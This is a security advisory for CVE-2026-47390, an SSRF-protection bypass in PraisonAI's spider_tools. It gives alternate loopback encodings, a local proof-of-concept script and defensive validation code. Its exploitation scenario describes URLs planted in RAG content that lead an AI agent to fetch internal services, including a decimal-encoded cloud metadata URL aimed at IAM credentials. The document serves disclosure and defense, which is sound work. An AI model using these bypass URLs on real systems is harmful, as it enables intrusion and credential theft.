PraisonAI's spider_tools implements SSRF protection as an exact-string blocklist that does not normalize alternate loopback representations: decimal integers, octal notation, hex, shortened dotted forms, and trailing-dot hostnames all bypass the check and reach localhost-bound services. In agentic deployments where user-controlled or LLM-generated URLs are passed to scrape_page(), crawl(), or extract_text(), an attacker can read responses from local admin panels or any other HTTP service bound exclusively to loopback. Cloud metadata endpoints (169.254.169.254) and private-network services may also be reachable if equivalent bypasses exist for those ranges; the original advisory confirms only the loopback case. With 69 prior CVEs in this package and SSRF being a well-understood cloud pivot technique, the exploitation bar is low once an attacker can influence agent inputs, a realistic condition in RAG pipelines or multi-agent workflows. Upgrade to praisonai 4.6.40 or praisonaiagents 1.6.40 immediately; if patching is delayed, add egress firewall rules blocking loopback, link-local, and RFC 1918 ranges at the network layer.
What is the risk?
Medium severity by CVSS (5.5), but contextually elevated for cloud-deployed AI agents. The vulnerability bypasses an explicit security control rather than exploiting a default-open behavior, which creates false confidence in developers who believe SSRF protection is active. EPSS data is unavailable, no active exploitation has been observed, and the CVE is not listed in CISA KEV. Blast radius is modest, with 1 reported downstream dependent, but any PraisonAI deployment that processes externally influenced URLs is directly in scope. The local attack vector (AV:L) in the CVSS vector likely reflects standalone desktop use; in containerized or cloud agent deployments, effective exploitability is higher because the attack can be initiated remotely through agent task inputs.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| PraisonAI | pip | <= 4.6.39 | 4.6.40 |
| praisonaiagents | pip | <= 1.6.39 | 1.6.40 |
What should I do?
1. Patch: upgrade praisonai to >= 4.6.40 or praisonaiagents to >= 1.6.40.
2. Network egress hardening (defense-in-depth): block outbound connections to 127.0.0.0/8, ::1, 169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 via iptables/nftables or cloud security groups on agent host environments.
3. If implementing custom URL validation, always resolve hostnames to IP addresses using socket.getaddrinfo() before blocklist evaluation; never compare raw hostname strings against a blocklist.
4. Detection: scan application and proxy logs for outbound requests containing hex IPs (0x7f...), octal notation (0177...), or decimal-encoded loopback (2130706433); in agentic frameworks, audit tool invocation logs for unusual localhost-variant URL patterns.
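Step 3 can be sketched in Python as follows. This is a minimal illustration, not the patched PraisonAI code: the names `resolve_host`, `is_forbidden_ip`, and `is_url_allowed` are hypothetical, and the injectable `resolver` parameter exists only so the check can be exercised without network access. The idea is to classify the addresses the resolver actually returns instead of comparing the raw host string.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def resolve_host(host: str) -> list[str]:
    """Resolve a host to IP address strings using the system resolver."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return [info[4][0] for info in infos]


def is_forbidden_ip(ip_text: str) -> bool:
    """Return True for addresses an outbound fetcher should not contact."""
    ip = ipaddress.ip_address(ip_text.split("%", 1)[0])  # drop any IPv6 zone id
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # treat ::ffff:127.0.0.1 like 127.0.0.1
    return (
        ip.is_loopback
        or ip.is_private
        or ip.is_link_local
        or ip.is_unspecified
        or ip.is_multicast
        or ip.is_reserved
    )


def is_url_allowed(url: str, resolver=resolve_host) -> bool:
    """Allow only http(s) URLs whose host resolves exclusively to public IPs."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        addresses = resolver(parts.hostname)
    except (OSError, UnicodeError):
        return False  # unresolvable hosts are rejected, not fetched
    return bool(addresses) and not any(is_forbidden_ip(a) for a in addresses)
```

A check like this only helps if the subsequent request connects to the address that was validated; redirects and a second DNS lookup at fetch time can otherwise reintroduce the problem, which is one reason the network-layer rules in step 2 remain useful.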
Frequently Asked Questions
Is CVE-2026-47390 actively exploited?
No confirmed active exploitation of CVE-2026-47390 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-47390?
1. Patch: upgrade praisonai to >= 4.6.40 or praisonaiagents to >= 1.6.40.
2. Network egress hardening (defense-in-depth): block outbound connections to 127.0.0.0/8, ::1, 169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 via iptables/nftables or cloud security groups on agent host environments.
3. If implementing custom URL validation, always resolve hostnames to IP addresses using socket.getaddrinfo() before blocklist evaluation; never compare raw hostname strings against a blocklist.
4. Detection: scan application and proxy logs for outbound requests containing hex IPs (0x7f...), octal notation (0177...), or decimal-encoded loopback (2130706433); in agentic frameworks, audit tool invocation logs for unusual localhost-variant URL patterns.
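The detection step could be prototyped with a small log scanner such as the one below. It is a rough sketch under assumptions: the log line format and the function name `find_suspicious_urls` are hypothetical, and the pattern flags unusual host shapes (hex, bare integer, shortened dotted form, leading-zero parts, trailing-dot localhost) rather than proving that a host is loopback.

```python
import re
from urllib.parse import urlsplit

# Matches http(s) URLs embedded in free-form log text.
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)

# Host shapes that rarely appear in legitimate outbound traffic.
SUSPICIOUS_HOST = re.compile(
    r"""^(?:
        0x[0-9a-f]+(?:\.(?:0x[0-9a-f]+|\d+)){0,3}  # hex parts: 0x7f000001
      | \d+                                         # bare integer: 2130706433
      | \d+(?:\.\d+){1,2}                           # short dotted form: 127.1
      | (?:\d+\.){0,3}0\d+(?:\.\d+)*                # leading-zero part: 0177.0.0.1
      | localhost\.                                 # trailing-dot localhost
    )$""",
    re.IGNORECASE | re.VERBOSE,
)


def find_suspicious_urls(log_line: str) -> list[str]:
    """Return URLs in a log line whose host uses an unusual encoding."""
    hits = []
    for match in URL_RE.finditer(log_line):
        url = match.group(0)
        try:
            host = urlsplit(url).hostname or ""
        except ValueError:
            continue  # malformed URL, nothing to classify
        if SUSPICIOUS_HOST.match(host):
            hits.append(url)
    return hits
```

Plain dotted-quad addresses such as 127.0.0.1 or 10.0.0.1 are deliberately not flagged here, since they are easier to catch with ordinary range checks; the scanner targets the encodings that slip past string comparison.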
What systems are affected by CVE-2026-47390?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, RAG pipelines, web scraping agents, multi-agent pipelines.
What is the CVSS score for CVE-2026-47390?
CVE-2026-47390 has a CVSS v3.1 base score of 5.5 (MEDIUM).
AI Security Impact
MITRE ATLAS Techniques
AML.T0049 Exploit Public-Facing Application
AML.T0051.001 Indirect
AML.T0053 AI Agent Tool Invocation
AML.T0086 Exfiltration via AI Agent Tool Invocation
Compliance Controls Affected
Technical Details
Original Advisory
### Summary

PraisonAI's `spider_tools` URL validation can be bypassed using alternate loopback host encodings.

The affected component is:

```text
praisonaiagents/tools/spider_tools.py
```

The tool contains a URL validation function intended to block local or unsafe targets before fetching attacker-controlled URLs. However, the validation only blocks a small set of exact host strings such as `localhost` and `127.0.0.1`. It does not normalize hostnames, resolve DNS, parse numeric IPv4 variants, or validate the final resolved IP address before making the request.

As a result, URLs such as the following bypass the protection and still reach loopback services:

```text
http://localhost.:8765/
http://127.1:8765/
http://0177.0.0.1:8765/
http://0x7f000001:8765/
http://2130706433:8765/
```

After the weak validation passes, `scrape_page()` calls `requests.Session.get()` on the attacker-controlled URL. This allows an attacker who can influence URLs passed to `scrape_page`, `crawl`, or `extract_text` to induce SSRF requests against loopback-only services.

This is a server-side request forgery protection bypass.

### Details

The affected code is in:

```text
praisonaiagents/tools/spider_tools.py
```

The vulnerable flow is:

```text
attacker-controlled URL
  -> spider_tools._validate_url(...)
  -> weak exact-host blocklist check
  -> validation passes for alternate loopback encodings
  -> scrape_page(...)
  -> requests.Session.get(attacker_url)
  -> loopback service is reached
```

The validation appears to block only exact local hostnames or exact IPv4 strings. For example, it blocks simple forms such as:

```text
localhost
127.0.0.1
```

However, equivalent loopback forms are not rejected before the request is made.

Confirmed bypass examples:

```text
http://localhost.:8765/
http://127.1:8765/
http://0177.0.0.1:8765/
http://0x7f000001:8765/
http://2130706433:8765/
```

These values can resolve or be interpreted as loopback addresses by the HTTP client / underlying networking stack, while bypassing the string-based validation.

The issue is not that `spider_tools` can fetch arbitrary URLs. The issue is that it attempts to provide SSRF protection, but the protection can be bypassed with alternate representations of loopback addresses.

### PoC

The following PoC is non-destructive. It starts a local HTTP server on `127.0.0.1:8765`, then sends several alternate loopback URL forms through the real `spider_tools` validation/fetch path.

The expected secure behavior is that all loopback variants should be rejected before any HTTP request is made. The actual vulnerable behavior is that the alternate loopback forms pass validation and reach the local server.

#### Full PoC

```python
#!/usr/bin/env python3
"""PoC for PraisonAI spider_tools localhost-alias SSRF bypass."""

from __future__ import annotations

import sys
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path

REPO_ROOT = Path(__file__).resolve().parents[3] / "repos" / "praisonai"
AGENTS_ROOT = REPO_ROOT / "src" / "praisonai-agents"
SPIDER_TOOLS = AGENTS_ROOT / "praisonaiagents/tools/spider_tools.py"


def verify_source() -> None:
    expected = [
        "def _validate_url",
        "requests.Session",
        ".get(",
    ]
    text = SPIDER_TOOLS.read_text(encoding="utf-8")
    for needle in expected:
        if needle not in text:
            raise RuntimeError(f"source verification failed: {needle!r} not found in {SPIDER_TOOLS}")


class LocalHandler(BaseHTTPRequestHandler):
    hits: list[tuple[str, str | None]] = []
    body = b"LOCAL-SPIDER-SSRF-SECRET"

    def do_GET(self) -> None:  # noqa: N802
        self.__class__.hits.append((self.path, self.headers.get("Host")))
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(self.body)))
        self.end_headers()
        self.wfile.write(self.body)

    def log_message(self, format: str, *args) -> None:  # noqa: A003
        return


def main() -> int:
    if not SPIDER_TOOLS.exists():
        raise SystemExit("missing local PraisonAI source tree")

    verify_source()
    sys.path.insert(0, str(AGENTS_ROOT))

    # Import the real shipped implementation.
    #
    # Depending on the exact public API exposed by spider_tools.py,
    # use the exported scrape function available in the local version.
    # The important path is:
    #
    #   _validate_url(url)
    #   -> requests.Session.get(url)
    #
    import praisonaiagents.tools.spider_tools as spider_tools

    server = HTTPServer(("127.0.0.1", 8765), LocalHandler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()

    candidates = [
        "http://localhost.:8765/",
        "http://127.1:8765/",
        "http://0177.0.0.1:8765/",
        "http://0x7f000001:8765/",
        "http://2130706433:8765/",
    ]

    try:
        for url in candidates:
            LocalHandler.hits.clear()
            try:
                # Prefer the real public scraping API when available.
                if hasattr(spider_tools, "scrape_page"):
                    result = spider_tools.scrape_page(url)
                elif hasattr(spider_tools, "extract_text"):
                    result = spider_tools.extract_text(url)
                elif hasattr(spider_tools, "crawl"):
                    result = spider_tools.crawl(url)
                else:
                    raise RuntimeError("No expected spider_tools public fetch function found")

                reached = bool(LocalHandler.hits)
                contains_secret = "LOCAL-SPIDER-SSRF-SECRET" in str(result)
                print(f"{url} passed=True reached_loopback={reached} contains_secret={contains_secret}")

                if not reached:
                    raise SystemExit(f"[poc] MISS: {url} did not reach loopback server")
            except Exception as exc:
                print(f"{url} blocked_or_failed={type(exc).__name__}: {exc}")
                raise
    finally:
        server.shutdown()
        server.server_close()
        thread.join(timeout=1)

    print("[poc] HIT: alternate loopback URL forms bypassed spider_tools SSRF protection")
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
```

#### Confirmed local result

The following bypasses were confirmed locally:

```text
localhost.   True ok ok local hit
127.1        True ok ok local hit
0177.0.0.1   True ok ok local hit
0x7f000001   True ok ok local hit
2130706433   True ok ok local hit
```

This demonstrates that the validation allows alternate loopback representations and that the request reaches a local-only HTTP service.

#### Expected secure behavior

All loopback-equivalent addresses should be blocked before the HTTP request is made.

Examples that should be rejected:

```text
http://localhost/
http://localhost./
http://127.0.0.1/
http://127.1/
http://0177.0.0.1/
http://0x7f000001/
http://2130706433/
http://[::1]/
```

#### Actual vulnerable behavior

Several alternate loopback representations pass validation and are fetched by the tool.

### Impact

An attacker who can influence URLs passed to PraisonAI's spider tools can cause the process to send HTTP requests to loopback-only services.

Potential impact includes:

* SSRF against localhost-only admin panels or development servers;
* access to local HTTP services that are not intended to be reachable remotely;
* retrieval of local service responses into the agent/tool output;
* possible access to cloud metadata or private-network services if equivalent bypasses exist for those address ranges in a given deployment.

The most direct confirmed impact is loopback SSRF through alternate hostname/IP encodings.

This report does not claim arbitrary TCP access or remote code execution. The demonstrated behavior is HTTP(S) SSRF through the spider URL-fetching feature.
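To illustrate why the bypass forms are equivalent to `127.0.0.1`, the sketch below interprets a host string the way classic `inet_aton`-style parsers do (hex and octal parts, with the last part filling the remaining bytes) and contrasts that with an exact-string lookup. `NAIVE_BLOCKLIST`, `parse_legacy_ipv4`, and `canonical_host` are hypothetical names used for illustration; the blocklist is a stand-in and not the actual contents of `_validate_url`.

```python
from __future__ import annotations

import ipaddress
import re

# Hypothetical stand-in for an exact-string blocklist (not PraisonAI's code).
NAIVE_BLOCKLIST = {"localhost", "127.0.0.1"}

# One numeric part: hex (0x..), octal (leading 0), or decimal.
_PART = re.compile(r"0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*")


def parse_legacy_ipv4(host: str) -> ipaddress.IPv4Address | None:
    """Interpret host as an inet_aton-style IPv4 literal, or return None."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(_PART.fullmatch(p) for p in parts):
        return None
    values = []
    for part in parts:
        if part[:2].lower() == "0x":
            values.append(int(part, 16))
        elif part.startswith("0"):
            values.append(int(part, 8))
        else:
            values.append(int(part, 10))
    *head, last = values
    # Leading parts are single bytes; the last part fills the remaining bytes.
    if any(v > 0xFF for v in head) or last >= 256 ** (4 - len(head)):
        return None
    number = last
    for index, value in enumerate(head):
        number += value << (8 * (3 - index))
    return ipaddress.IPv4Address(number)


def canonical_host(host: str) -> str:
    """Lowercase, drop one trailing dot, and normalize numeric IPv4 forms."""
    name = host.lower()
    if name.endswith("."):
        name = name[:-1]
    ip = parse_legacy_ipv4(name)
    return str(ip) if ip is not None else name


BYPASS_HOSTS = ["localhost.", "127.1", "0177.0.0.1", "0x7f000001", "2130706433"]
for host in BYPASS_HOSTS:
    # Raw string lookup misses each host; the canonical form does not.
    print(host, host in NAIVE_BLOCKLIST, canonical_host(host) in NAIVE_BLOCKLIST)
```

Normalization alone closes the string-comparison gap for these five hosts, but a DNS name that resolves to loopback would still pass, so checking the resolved address remains necessary.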
Exploitation Scenario
An adversary embeds a crafted URL in content indexed by a PraisonAI agent's RAG pipeline or in a web page being crawled, for example a link to http://2130706433:8080/admin. When the agent processes this content and invokes scrape_page() to follow the URL, the exact-string validation approves the decimal-encoded loopback address, and requests.Session issues a GET to the local admin service. The server response, which may contain configuration data, session tokens, or internal API credentials, is returned as tool output to the agent, where it may be logged, embedded in agent context, or surfaced to the requesting user. In a cloud environment the analogous target is the instance metadata service, but 2130706433 is the decimal form of 127.0.0.1 and does not reach it; the attacker would need an alternate encoding of 169.254.169.254 (decimal 2852039166), for example http://2852039166/latest/meta-data/iam/security-credentials/, which could expose IAM credentials for the underlying host instance. The original advisory does not confirm that the blocklist can be bypassed for that range.
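The numeric forms in this scenario are simply the 32-bit integer value of the IPv4 address written in different bases. The short sketch below, using a hypothetical helper named `encodings`, derives them with the standard `ipaddress` module; it shows that 2130706433 corresponds to 127.0.0.1, while the link-local metadata address 169.254.169.254 has a different integer value.

```python
import ipaddress


def encodings(address: str) -> dict[str, str]:
    """Return alternate textual encodings of a dotted-quad IPv4 address."""
    ip = ipaddress.IPv4Address(address)
    number = int(ip)      # the address as one 32-bit integer
    octets = ip.packed    # the four address bytes
    rest = ".".join(str(b) for b in octets[1:])
    return {
        "dotted": str(ip),
        "decimal": str(number),
        "hex": f"0x{number:08x}",
        "octal_first_octet": f"0{octets[0]:o}.{rest}",
    }


loopback = encodings("127.0.0.1")
metadata = encodings("169.254.169.254")
print(loopback["decimal"], loopback["hex"], loopback["octal_first_octet"])
print(metadata["decimal"], metadata["hex"], metadata["octal_first_octet"])
```

Whether a given HTTP client accepts each of these forms depends on its URL parser and the platform resolver, so the table of encodings is a starting point for testing a validator rather than a guarantee of reachability.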
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
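The 5.5 base score can be reproduced from this vector with the CVSS v3.1 base-score equations. The sketch below is a simplified calculator, assuming Scope: Unchanged only (which is what this vector uses); the function names are illustrative, and the metric weights are the ones published in the CVSS v3.1 specification.

```python
import math

# CVSS v3.1 metric weights (Privileges Required values are for Scope: Unchanged).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "CIA": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value: float) -> float:
    """Round up to one decimal place as defined by the CVSS v3.1 spec."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score for a Scope: Unchanged CVSS v3.1 vector."""
    prefix, *pairs = vector.split("/")
    if prefix != "CVSS:3.1":
        raise ValueError("expected a CVSS:3.1 vector")
    metrics = dict(pair.split(":") for pair in pairs)
    if metrics["S"] != "U":
        raise NotImplementedError("this sketch covers Scope: Unchanged only")
    cia = WEIGHTS["CIA"]
    iss = 1 - (1 - cia[metrics["C"]]) * (1 - cia[metrics["I"]]) * (1 - cia[metrics["A"]])
    impact = 6.42 * iss
    exploitability = (
        8.22
        * WEIGHTS["AV"][metrics["AV"]]
        * WEIGHTS["AC"][metrics["AC"]]
        * WEIGHTS["PR"][metrics["PR"]]
        * WEIGHTS["UI"][metrics["UI"]]
    )
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"))
```

For this vector the impact term is 6.42 × 0.56 ≈ 3.60 and the exploitability term is about 1.83, which sum to roughly 5.43 and round up to 5.5. Changing AV:L to AV:N, as discussed for remotely reachable agent deployments, raises the exploitability term and therefore the score.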
Related Vulnerabilities
| ID | Score | Summary | Relation |
|---|---|---|---|
| CVE-2026-47392 | 9.9 | praisonaiagents: RCE via Python sandbox bypass | Same package: praisonai |
| GHSA-vc46-vw85-3wvm | 9.8 | PraisonAI: RCE via malicious workflow YAML execution | Same package: praisonai |
| CVE-2026-39890 | 9.8 | PraisonAI: YAML deserialization enables unauthenticated RCE | Same package: praisonai |
| GHSA-9qhq-v63v-fv3j | 9.8 | PraisonAI: RCE via MCP command injection | Same package: praisonai |
| CVE-2026-47410 | 9.8 | praisonai-platform: hardcoded JWT → full account takeover | Same package: praisonai |